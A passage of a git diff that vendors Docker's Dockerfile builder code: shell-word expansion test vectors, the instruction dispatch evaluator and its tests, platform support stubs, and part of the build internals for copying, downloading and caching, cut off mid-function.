+A|"hello | hello +A|"hello\" | hello" +A|"hel'lo" | hel'lo +A|'hello | hello +A|'hello\' | hello\ +A|"''" | '' +A|$. | $. +A|$1 | +A|he$1x | hex +A|he$.x | he$.x +# Next one is different on Windows as $pwd==$PWD +U|he$pwd. | he. +W|he$pwd. | he/home. +A|he$PWD | he/home +A|he\$PWD | he$PWD +A|he\\$PWD | he\/home +A|he\${} | he${} +A|he\${}xx | he${}xx +A|he${} | he +A|he${}xx | hexx +A|he${hi} | he +A|he${hi}xx | hexx +A|he${PWD} | he/home +A|he${.} | error +A|he${XXX:-000}xx | he000xx +A|he${PWD:-000}xx | he/homexx +A|he${XXX:-$PWD}xx | he/homexx +A|he${XXX:-${PWD:-yyy}}xx | he/homexx +A|he${XXX:-${YYY:-yyy}}xx | heyyyxx +A|he${XXX:YYY} | error +A|he${XXX:+${PWD}}xx | hexx +A|he${PWD:+${XXX}}xx | hexx +A|he${PWD:+${SHELL}}xx | hebashxx +A|he${XXX:+000}xx | hexx +A|he${PWD:+000}xx | he000xx +A|'he${XX}' | he${XX} +A|"he${PWD}" | he/home +A|"he'$PWD'" | he'/home' +A|"$PWD" | /home +A|'$PWD' | $PWD +A|'\$PWD' | \$PWD +A|'"hello"' | "hello" +A|he\$PWD | he$PWD +A|"he\$PWD" | he$PWD +A|'he\$PWD' | he\$PWD +A|he${PWD | error +A|he${PWD:=000}xx | error +A|he${PWD:+${PWD}:}xx | he/home:xx +A|he${XXX:-\$PWD:}xx | he$PWD:xx +A|he${XXX:-\${PWD}z}xx | he${PWDz}xx +A|안녕하세요 | 안녕하세요 +A|안'녕'하세요 | 안녕하세요 +A|안'녕하세요 | 안녕하세요 +A|안녕\'하세요 | 안녕'하세요 +A|안\\'녕하세요 | 안\녕하세요 +A|안녕\t하세요 | 안녕t하세요 +A|"안녕\t하세요" | 안녕\t하세요 +A|'안녕\t하세요 | 안녕\t하세요 +A|안녕하세요\ | 안녕하세요 +A|안녕하세요\\ | 안녕하세요\ +A|"안녕하세요 | 안녕하세요 +A|"안녕하세요\" | 안녕하세요" +A|"안녕'하세요" | 안녕'하세요 +A|'안녕하세요 | 안녕하세요 +A|'안녕하세요\' | 안녕하세요\ +A|안녕$1x | 안녕x +A|안녕$.x | 안녕$.x +# Next one is different on Windows as $pwd==$PWD +U|안녕$pwd. | 안녕. +W|안녕$pwd. | 안녕/home. +A|안녕$PWD | 안녕/home +A|안녕\$PWD | 안녕$PWD +A|안녕\\$PWD | 안녕\/home +A|안녕\${} | 안녕${} +A|안녕\${}xx | 안녕${}xx +A|안녕${} | 안녕 +A|안녕${}xx | 안녕xx +A|안녕${hi} | 안녕 +A|안녕${hi}xx | 안녕xx +A|안녕${PWD} | 안녕/home +A|안녕${.} | error +A|안녕${XXX:-000}xx | 안녕000xx +A|안녕${PWD:-000}xx | 안녕/homexx +A|안녕${XXX:-$PWD}xx | 안녕/homexx +A|안녕${XXX:-${PWD:-yyy}}xx | 안녕/homexx +A|안녕${XXX:-${YYY:-yyy}}xx | 안녕yyyxx +A|안녕${XXX:YYY} | error +A|안녕${XXX:+${PWD}}xx | 안녕xx +A|안녕${PWD:+${XXX}}xx | 안녕xx +A|안녕${PWD:+${SHELL}}xx | 안녕bashxx +A|안녕${XXX:+000}xx | 안녕xx +A|안녕${PWD:+000}xx | 안녕000xx +A|'안녕${XX}' | 안녕${XX} +A|"안녕${PWD}" | 안녕/home +A|"안녕'$PWD'" | 안녕'/home' +A|'"안녕"' | "안녕" +A|안녕\$PWD | 안녕$PWD +A|"안녕\$PWD" | 안녕$PWD +A|'안녕\$PWD' | 안녕\$PWD +A|안녕${PWD | error +A|안녕${PWD:=000}xx | error +A|안녕${PWD:+${PWD}:}xx | 안녕/home:xx +A|안녕${XXX:-\$PWD:}xx | 안녕$PWD:xx +A|안녕${XXX:-\${PWD}z}xx | 안녕${PWDz}xx +A|$KOREAN | 한국어 +A|안녕$KOREAN | 안녕한국어 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go new file mode 100644 index 0000000000..f5997c91a6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go @@ -0,0 +1,244 @@ +// Package dockerfile is the evaluation step in the Dockerfile parse/evaluate pipeline. +// +// It incorporates a dispatch table based on the parser.Node values (see the +// parser package for more information) that are yielded from the parser itself. +// Calling NewBuilder with the BuildOpts struct can be used to customize the +// experience for execution purposes only. Parsing is controlled in the parser +// package, and this division of responsibility should be respected. +// +// Please see the jump table targets for the actual invocations, most of which +// will call out to the functions in internals.go to deal with their tasks. +// +// ONBUILD is a special case, which is covered in the onbuild() func in +// dispatchers.go. +// +// The evaluator uses the concept of "steps", which are usually each processable +// line in the Dockerfile. Each step is numbered and certain actions are taken +// before and after each step, such as creating an image ID and removing temporary +// containers and images. Note that ONBUILD creates a kinda-sorta "sub run" which +// includes its own set of steps (usually only one of them). +package dockerfile + +import ( + "fmt" + "strings" + + "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/builder/dockerfile/parser" +) + +// Environment variable interpolation will happen on these statements only. +var replaceEnvAllowed = map[string]bool{ + command.Env: true, + command.Label: true, + command.Add: true, + command.Copy: true, + command.Workdir: true, + command.Expose: true, + command.Volume: true, + command.User: true, + command.StopSignal: true, + command.Arg: true, +} + +// Certain commands are allowed to have their args split into more +// words after env var replacements. Meaning: +// ENV foo="123 456" +// EXPOSE $foo +// should result in the same thing as: +// EXPOSE 123 456 +// and not treat "123 456" as a single word. +// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing. +// Quotes will cause it to still be treated as single word. +var allowWordExpansion = map[string]bool{ + command.Expose: true, +} + +var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error + +func init() { + evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{ + command.Add: add, + command.Arg: arg, + command.Cmd: cmd, + command.Copy: dispatchCopy, // copy() is a go builtin + command.Entrypoint: entrypoint, + command.Env: env, + command.Expose: expose, + command.From: from, + command.Healthcheck: healthcheck, + command.Label: label, + command.Maintainer: maintainer, + command.Onbuild: onbuild, + command.Run: run, + command.Shell: shell, + command.StopSignal: stopSignal, + command.User: user, + command.Volume: volume, + command.Workdir: workdir, + } +} + +// This method is the entrypoint to all statement handling routines. +// +// Almost all nodes will have this structure: +// Child[Node, Node, Node] where Child is from parser.Node.Children and each +// node comes from parser.Node.Next. This forms a "line" with a statement and +// arguments and we process them in this normalized form by hitting +// evaluateTable with the leaf nodes of the command and the Builder object. +// +// ONBUILD is a special case; in this case the parser will emit: +// Child[Node, Child[Node, Node...]] where the first node is the literal +// "onbuild" and the child entrypoint is the command of the ONBUILD statement, +// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to +// deal with that, at least until it becomes more of a general concern with new +// features. +func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error { + cmd := ast.Value + upperCasedCmd := strings.ToUpper(cmd) + + // To ensure the user is given a decent error message if the platform + // on which the daemon is running does not support a builder command. + if err := platformSupports(strings.ToLower(cmd)); err != nil { + return err + } + + attrs := ast.Attributes + original := ast.Original + flags := ast.Flags + strList := []string{} + msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd) + + if len(ast.Flags) > 0 { + msg += " " + strings.Join(ast.Flags, " ") + } + + if cmd == "onbuild" { + if ast.Next == nil { + return fmt.Errorf("ONBUILD requires at least one argument") + } + ast = ast.Next.Children[0] + strList = append(strList, ast.Value) + msg += " " + ast.Value + + if len(ast.Flags) > 0 { + msg += " " + strings.Join(ast.Flags, " ") + } + + } + + // count the number of nodes that we are going to traverse first + // so we can pre-create the argument and message array. This speeds up the + // allocation of those list a lot when they have a lot of arguments + cursor := ast + var n int + for cursor.Next != nil { + cursor = cursor.Next + n++ + } + msgList := make([]string, n) + + var i int + // Append the build-time args to config-environment. + // This allows builder config to override the variables, making the behavior similar to + // a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build + // context. But `ENV foo $foo` will use the value from build context if one + // isn't already been defined by a previous ENV primitive. + // Note, we get this behavior because we know that ProcessWord() will + // stop on the first occurrence of a variable name and not notice + // a subsequent one. So, putting the buildArgs list after the Config.Env + // list, in 'envs', is safe. + envs := b.runConfig.Env + for key, val := range b.options.BuildArgs { + if !b.isBuildArgAllowed(key) { + // skip build-args that are not in allowed list, meaning they have + // not been defined by an "ARG" Dockerfile command yet. + // This is an error condition but only if there is no "ARG" in the entire + // Dockerfile, so we'll generate any necessary errors after we parsed + // the entire file (see 'leftoverArgs' processing in evaluator.go ) + continue + } + envs = append(envs, fmt.Sprintf("%s=%s", key, *val)) + } + for ast.Next != nil { + ast = ast.Next + var str string + str = ast.Value + if replaceEnvAllowed[cmd] { + var err error + var words []string + + if allowWordExpansion[cmd] { + words, err = ProcessWords(str, envs, b.directive.EscapeToken) + if err != nil { + return err + } + strList = append(strList, words...) + } else { + str, err = ProcessWord(str, envs, b.directive.EscapeToken) + if err != nil { + return err + } + strList = append(strList, str) + } + } else { + strList = append(strList, str) + } + msgList[i] = ast.Value + i++ + } + + msg += " " + strings.Join(msgList, " ") + fmt.Fprintln(b.Stdout, msg) + + // XXX yes, we skip any cmds that are not valid; the parser should have + // picked these out already. + if f, ok := evaluateTable[cmd]; ok { + b.flags = NewBFlags() + b.flags.Args = flags + return f(b, strList, attrs, original) + } + + return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +} + +// checkDispatch does a simple check for syntax errors of the Dockerfile. +// Because some of the instructions can only be validated through runtime, +// arg, env, etc., this syntax check will not be complete and could not replace +// the runtime check. Instead, this function is only a helper that allows +// user to find out the obvious error in Dockerfile earlier on. +// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger +func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error { + cmd := ast.Value + upperCasedCmd := strings.ToUpper(cmd) + + // To ensure the user is given a decent error message if the platform + // on which the daemon is running does not support a builder command. + if err := platformSupports(strings.ToLower(cmd)); err != nil { + return err + } + + // The instruction itself is ONBUILD, we will make sure it follows with at + // least one argument + if upperCasedCmd == "ONBUILD" { + if ast.Next == nil { + return fmt.Errorf("ONBUILD requires at least one argument") + } + } + + // The instruction is part of ONBUILD trigger (not the instruction itself) + if onbuild { + switch upperCasedCmd { + case "ONBUILD": + return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") + case "MAINTAINER", "FROM": + return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd) + } + } + + if _, ok := evaluateTable[cmd]; ok { + return nil + } + + return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go new file mode 100644 index 0000000000..4340a2f8ac --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go @@ -0,0 +1,197 @@ +package dockerfile + +import ( + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +type dispatchTestCase struct { + name, dockerfile, expectedError string + files map[string]string +} + +func init() { + reexec.Init() +} + +func initDispatchTestCases() []dispatchTestCase { + dispatchTestCases := []dispatchTestCase{{ + name: "copyEmptyWhitespace", + dockerfile: `COPY + quux \ + bar`, + expectedError: "COPY requires at least two arguments", + }, + { + name: "ONBUILD forbidden FROM", + dockerfile: "ONBUILD FROM scratch", + expectedError: "FROM isn't allowed as an ONBUILD trigger", + files: nil, + }, + { + name: "ONBUILD forbidden MAINTAINER", + dockerfile: "ONBUILD MAINTAINER docker.io", + expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger", + files: nil, + }, + { + name: "ARG two arguments", + dockerfile: "ARG foo bar", + expectedError: "ARG requires exactly one argument", + files: nil, + }, + { + name: "MAINTAINER unknown flag", + dockerfile: "MAINTAINER --boo joe@example.com", + expectedError: "Unknown flag: boo", + files: nil, + }, + { + name: "ADD multiple files to file", + dockerfile: "ADD file1.txt file2.txt test", + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "JSON ADD multiple files to file", + dockerfile: `ADD ["file1.txt", "file2.txt", "test"]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "Wildcard ADD multiple files to file", + dockerfile: "ADD file*.txt test", + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "Wildcard JSON ADD multiple files to file", + dockerfile: `ADD ["file*.txt", "test"]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "COPY multiple files to file", + dockerfile: "COPY file1.txt file2.txt test", + expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "JSON COPY multiple files to file", + dockerfile: `COPY ["file1.txt", "file2.txt", "test"]`, + expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "ADD multiple files to file with whitespace", + dockerfile: `ADD [ "test file1.txt", "test file2.txt", "test" ]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, + }, + { + name: "COPY multiple files to file with whitespace", + dockerfile: `COPY [ "test file1.txt", "test file2.txt", "test" ]`, + expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, + }, + { + name: "COPY wildcard no files", + dockerfile: `COPY file*.txt /tmp/`, + expectedError: "No source files were specified", + files: nil, + }, + { + name: "COPY url", + dockerfile: `COPY https://index.docker.io/robots.txt /`, + expectedError: "Source can't be a URL for COPY", + files: nil, + }, + { + name: "Chaining ONBUILD", + dockerfile: `ONBUILD ONBUILD RUN touch foobar`, + expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed", + files: nil, + }, + { + name: "Invalid instruction", + dockerfile: `foo bar`, + expectedError: "Unknown instruction: FOO", + files: nil, + }} + + return dispatchTestCases +} + +func TestDispatch(t *testing.T) { + testCases := initDispatchTestCases() + + for _, testCase := range testCases { + executeTestCase(t, testCase) + } +} + +func executeTestCase(t *testing.T, testCase dispatchTestCase) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + for filename, content := range testCase.files { + createTestTempFile(t, contextDir, filename, content, 0777) + } + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when creating tar stream: %s", err) + } + + defer func() { + if err = tarStream.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + }() + + context, err := builder.MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when creating tar context: %s", err) + } + + defer func() { + if err = context.Close(); err != nil { + t.Fatalf("Error when closing tar context: %s", err) + } + }() + + r := strings.NewReader(testCase.dockerfile) + d := parser.Directive{} + parser.SetEscapeToken(parser.DefaultEscapeToken, &d) + n, err := parser.Parse(r, &d) + + if err != nil { + t.Fatalf("Error when parsing Dockerfile: %s", err) + } + + config := &container.Config{} + options := &types.ImageBuildOptions{} + + b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context} + + err = b.dispatch(0, len(n.Children), n.Children[0]) + + if err == nil { + t.Fatalf("No error when executing test %s", testCase.name) + } + + if !strings.Contains(err.Error(), testCase.expectedError) { + t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", testCase.expectedError, err.Error()) + } + +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go new file mode 100644 index 0000000000..28fd5b156b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go @@ -0,0 +1,9 @@ +// +build !windows + +package dockerfile + +// platformSupports is a short-term function to give users a quality error +// message if a Dockerfile uses a command not supported on the platform. +func platformSupports(command string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go new file mode 100644 index 0000000000..72483a2ec8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go @@ -0,0 +1,13 @@ +package dockerfile + +import "fmt" + +// platformSupports is gives users a quality error message if a Dockerfile uses +// a command not supported on the platform. +func platformSupports(command string) error { + switch command { + case "stopsignal": + return fmt.Errorf("The daemon on this platform does not support the command '%s'", command) + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go new file mode 100644 index 0000000000..6f0a367842 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go @@ -0,0 +1,669 @@ +package dockerfile + +// internals for handling commands. Covers many areas and a lot of +// non-contiguous functionality. Please read the comments. + +import ( + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/url" + "os" + "path/filepath" + "sort" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/tarsum" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/docker/runconfig/opts" +) + +func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error { + if b.disableCommit { + return nil + } + if b.image == "" && !b.noBaseImage { + return fmt.Errorf("Please provide a source image with `from` prior to commit") + } + b.runConfig.Image = b.image + + if id == "" { + cmd := b.runConfig.Cmd + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment)) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + hit, err := b.probeCache() + if err != nil { + return err + } else if hit { + return nil + } + id, err = b.create() + if err != nil { + return err + } + } + + // Note: Actually copy the struct + autoConfig := *b.runConfig + autoConfig.Cmd = autoCmd + + commitCfg := &backend.ContainerCommitConfig{ + ContainerCommitConfig: types.ContainerCommitConfig{ + Author: b.maintainer, + Pause: true, + Config: &autoConfig, + }, + } + + // Commit the container + imageID, err := b.docker.Commit(id, commitCfg) + if err != nil { + return err + } + + b.image = imageID + return nil +} + +type copyInfo struct { + builder.FileInfo + decompress bool +} + +func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error { + if b.context == nil { + return fmt.Errorf("No context given. Impossible to use %s", cmdName) + } + + if len(args) < 2 { + return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName) + } + + // Work in daemon-specific filepath semantics + dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest + + b.runConfig.Image = b.image + + var infos []copyInfo + + // Loop through each src file and calculate the info we need to + // do the copy (e.g. hash value if cached). Don't actually do + // the copy until we've looked at all src files + var err error + for _, orig := range args[0 : len(args)-1] { + var fi builder.FileInfo + decompress := allowLocalDecompression + if urlutil.IsURL(orig) { + if !allowRemote { + return fmt.Errorf("Source can't be a URL for %s", cmdName) + } + fi, err = b.download(orig) + if err != nil { + return err + } + defer os.RemoveAll(filepath.Dir(fi.Path())) + decompress = false + infos = append(infos, copyInfo{fi, decompress}) + continue + } + // not a URL + subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true) + if err != nil { + return err + } + + infos = append(infos, subInfos...) + } + + if len(infos) == 0 { + return fmt.Errorf("No source files were specified") + } + if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) { + return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) + } + + // For backwards compat, if there's just one info then use it as the + // cache look-up string, otherwise hash 'em all into one + var srcHash string + var origPaths string + + if len(infos) == 1 { + fi := infos[0].FileInfo + origPaths = fi.Name() + if hfi, ok := fi.(builder.Hashed); ok { + srcHash = hfi.Hash() + } + } else { + var hashs []string + var origs []string + for _, info := range infos { + fi := info.FileInfo + origs = append(origs, fi.Name()) + if hfi, ok := fi.(builder.Hashed); ok { + hashs = append(hashs, hfi.Hash()) + } + } + hasher := sha256.New() + hasher.Write([]byte(strings.Join(hashs, ","))) + srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil)) + origPaths = strings.Join(origs, " ") + } + + cmd := b.runConfig.Cmd + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest))) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + if hit, err := b.probeCache(); err != nil { + return err + } else if hit { + return nil + } + + container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) + if err != nil { + return err + } + b.tmpContainers[container.ID] = struct{}{} + + comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest) + + // Twiddle the destination when its a relative path - meaning, make it + // relative to the WORKINGDIR + if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil { + return err + } + + for _, info := range infos { + if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil { + return err + } + } + + return b.commit(container.ID, cmd, comment) +} + +func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) { + // get filename from URL + u, err := url.Parse(srcURL) + if err != nil { + return + } + path := filepath.FromSlash(u.Path) // Ensure in platform semantics + if strings.HasSuffix(path, string(os.PathSeparator)) { + path = path[:len(path)-1] + } + parts := strings.Split(path, string(os.PathSeparator)) + filename := parts[len(parts)-1] + if filename == "" { + err = fmt.Errorf("cannot determine filename from url: %s", u) + return + } + + // Initiate the download + resp, err := httputils.Download(srcURL) + if err != nil { + return + } + + // Prepare file in a tmp dir + tmpDir, err := ioutils.TempDir("", "docker-remote") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + tmpFileName := filepath.Join(tmpDir, filename) + tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if err != nil { + return + } + + stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter) + progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true) + progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") + // Download and dump result to tmp file + if _, err = io.Copy(tmpFile, progressReader); err != nil { + tmpFile.Close() + return + } + fmt.Fprintln(b.Stdout) + // ignoring error because the file was already opened successfully + tmpFileSt, err := tmpFile.Stat() + if err != nil { + tmpFile.Close() + return + } + + // Set the mtime to the Last-Modified header value if present + // Otherwise just remove atime and mtime + mTime := time.Time{} + + lastMod := resp.Header.Get("Last-Modified") + if lastMod != "" { + // If we can't parse it then just let it default to 'zero' + // otherwise use the parsed time value + if parsedMTime, err := http.ParseTime(lastMod); err == nil { + mTime = parsedMTime + } + } + + tmpFile.Close() + + if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil { + return + } + + // Calc the checksum, even if we're using the cache + r, err := archive.Tar(tmpFileName, archive.Uncompressed) + if err != nil { + return + } + tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1) + if err != nil { + return + } + if _, err = io.Copy(ioutil.Discard, tarSum); err != nil { + return + } + hash := tarSum.Sum(nil) + r.Close() + return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil +} + +func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) { + + // Work in daemon-specific OS filepath semantics + origPath = filepath.FromSlash(origPath) + + if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 { + origPath = origPath[1:] + } + origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator)) + + // Deal with wildcards + if allowWildcards && containsWildcards(origPath) { + var copyInfos []copyInfo + if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error { + if err != nil { + return err + } + if info.Name() == "" { + // Why are we doing this check? + return nil + } + if match, _ := filepath.Match(origPath, path); !match { + return nil + } + + // Note we set allowWildcards to false in case the name has + // a * in it + subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false) + if err != nil { + return err + } + copyInfos = append(copyInfos, subInfos...) + return nil + }); err != nil { + return nil, err + } + return copyInfos, nil + } + + // Must be a dir or a file + + statPath, fi, err := b.context.Stat(origPath) + if err != nil { + return nil, err + } + + copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}} + + hfi, handleHash := fi.(builder.Hashed) + if !handleHash { + return copyInfos, nil + } + + // Deal with the single file case + if !fi.IsDir() { + hfi.SetHash("file:" + hfi.Hash()) + return copyInfos, nil + } + // Must be a dir + var subfiles []string + err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error { + if err != nil { + return err + } + // we already checked handleHash above + subfiles = append(subfiles, info.(builder.Hashed).Hash()) + return nil + }) + if err != nil { + return nil, err + } + + sort.Strings(subfiles) + hasher := sha256.New() + hasher.Write([]byte(strings.Join(subfiles, ","))) + hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil))) + + return copyInfos, nil +} + +func (b *Builder) processImageFrom(img builder.Image) error { + if img != nil { + b.image = img.ImageID() + + if img.RunConfig() != nil { + b.runConfig = img.RunConfig() + } + } + + // Check to see if we have a default PATH, note that windows won't + // have one as its set by HCS + if system.DefaultPathEnv != "" { + // Convert the slice of strings that represent the current list + // of env vars into a map so we can see if PATH is already set. + // If its not set then go ahead and give it our default value + configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env) + if _, ok := configEnv["PATH"]; !ok { + b.runConfig.Env = append(b.runConfig.Env, + "PATH="+system.DefaultPathEnv) + } + } + + if img == nil { + // Typically this means they used "FROM scratch" + return nil + } + + // Process ONBUILD triggers if they exist + if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 { + word := "trigger" + if nTriggers > 1 { + word = "triggers" + } + fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word) + } + + // Copy the ONBUILD triggers, and remove them from the config, since the config will be committed. + onBuildTriggers := b.runConfig.OnBuild + b.runConfig.OnBuild = []string{} + + // parse the ONBUILD triggers by invoking the parser + for _, step := range onBuildTriggers { + ast, err := parser.Parse(strings.NewReader(step), &b.directive) + if err != nil { + return err + } + + total := len(ast.Children) + for _, n := range ast.Children { + if err := b.checkDispatch(n, true); err != nil { + return err + } + } + for i, n := range ast.Children { + if err := b.dispatch(i, total, n); err != nil { + return err + } + } + } + + return nil +} + +// probeCache checks if cache match can be found for current build instruction. +// If an image is found, probeCache returns `(true, nil)`. +// If no image is found, it returns `(false, nil)`. +// If there is any error, it returns `(false, err)`. +func (b *Builder) probeCache() (bool, error) { + c := b.imageCache + if c == nil || b.options.NoCache || b.cacheBusted { + return false, nil + } + cache, err := c.GetCache(b.image, b.runConfig) + if err != nil { + return false, err + } + if len(cache) == 0 { + logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd) + b.cacheBusted = true + return false, nil + } + + fmt.Fprintf(b.Stdout, " ---> Using cache\n") + logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd) + b.image = string(cache) + + return true, nil +} + +func (b *Builder) create() (string, error) { + if b.image == "" && !b.noBaseImage { + return "", fmt.Errorf("Please provide a source image with `from` prior to run") + } + b.runConfig.Image = b.image + + resources := container.Resources{ + CgroupParent: b.options.CgroupParent, + CPUShares: b.options.CPUShares, + CPUPeriod: b.options.CPUPeriod, + CPUQuota: b.options.CPUQuota, + CpusetCpus: b.options.CPUSetCPUs, + CpusetMems: b.options.CPUSetMems, + Memory: b.options.Memory, + MemorySwap: b.options.MemorySwap, + Ulimits: b.options.Ulimits, + } + + // TODO: why not embed a hostconfig in builder? + hostConfig := &container.HostConfig{ + SecurityOpt: b.options.SecurityOpt, + Isolation: b.options.Isolation, + ShmSize: b.options.ShmSize, + Resources: resources, + NetworkMode: container.NetworkMode(b.options.NetworkMode), + } + + config := *b.runConfig + + // Create the container + c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{ + Config: b.runConfig, + HostConfig: hostConfig, + }) + if err != nil { + return "", err + } + for _, warning := range c.Warnings { + fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) + } + + b.tmpContainers[c.ID] = struct{}{} + fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID)) + + // override the entry point that may have been picked up from the base image + if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil { + return "", err + } + + return c.ID, nil +} + +var errCancelled = errors.New("build cancelled") + +func (b *Builder) run(cID string) (err error) { + errCh := make(chan error) + go func() { + errCh <- b.docker.ContainerAttachRaw(cID, nil, 